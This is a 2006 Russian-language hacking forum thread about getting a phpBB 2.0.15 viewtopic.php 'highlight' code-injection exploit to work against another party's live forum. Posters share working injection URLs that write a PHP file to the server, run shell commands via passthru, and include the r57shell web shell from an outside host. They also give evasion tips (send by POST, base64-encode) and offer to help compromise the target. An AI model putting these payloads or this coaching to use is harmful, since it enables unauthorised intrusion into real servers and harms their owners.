Вопрос по уязвимости в viewtopic.php

Discussion in 'Песочница' started by MaddyMan, 27 Aug 2006.

  1. MaddyMan

    MaddyMan New Member

    Joined:
    31 Aug 2005
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    somesite.ru
    Вчера залез посмотреть про хитмана и обнаружил, что форум phpbb 2.0.15 .. =)
    эксплоит работает, а fopen() и т.д. - нет.
    делал так: viewtopic.php?t=2206&c=$f=fopen(./images/avatars/images.php,w);fwrite($f,"phpinfo();");&highlight='.eval($_GET[c]).'

    ничего не работает, что посоветуете? :)
    пробовал это же на локалхосте - гуд, почему там не работает?

    кстати, там виндовс стоит - 2003 сервер, скорее всего
    &highlight='.passthru(dir).' не пашет тоже.

    [mod] Ссылки только в личке и Просьбах о взломах [/mod]
     
    #1 MaddyMan, 27 Aug 2006
    Last edited by a moderator: 28 Aug 2006
  2. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,362
    Likes Received:
    1,157
    Reputations:
    430
    viewtopic.php?t=2206&highlight='.passthru(dir).'А может вот так правильней будет?
     
  3. k1b0rg

    k1b0rg Тут может быть ваша реклама.

    Joined:
    30 Jul 2005
    Messages:
    1,182
    Likes Received:
    399
    Reputations:
    479
    viewtopic.php?t=2206&c=$f=fopen(./images/avatars/images.php,w);fwrite($f,"phpinfo();");&highlight='.eval($_GET[c]).'

    никогда так не делай.
    Такие данные шли постом, а лучше в base64.
    давай сцылку на форум, поможем
     
  4. MaddyMan

    MaddyMan New Member

    Joined:
    31 Aug 2005
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Я же написал в начале - somesite.ru - форум "нового диска" =)

    [mod] Ссылки только в личке и Просьбах о взломах [/mod]
     
    #4 MaddyMan, 28 Aug 2006
    Last edited by a moderator: 28 Aug 2006
  5. MaddyMan

    MaddyMan New Member

    Joined:
    31 Aug 2005
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    попробуй сам - не пашет

    кроме phpinfo(); и раскрытия пути работает только эксплоит про пасс к базе форума
     
    #5 MaddyMan, 28 Aug 2006
    Last edited: 28 Aug 2006
  6. 1ten0.0net1

    1ten0.0net1 Time out

    Joined:
    28 Nov 2005
    Messages:
    473
    Likes Received:
    330
    Reputations:
    389
    viewtopic.php?t=2206&highlight=%2527.eval($_GET[c1]).%2527&c1=include($_GET[c2])&c2=http://rst.void.ru/download/r57shell.txt

    Если не получится пробуй багу с регэкспами.
     
    #6 1ten0.0net1, 1 Sep 2006
    Last edited: 1 Sep 2006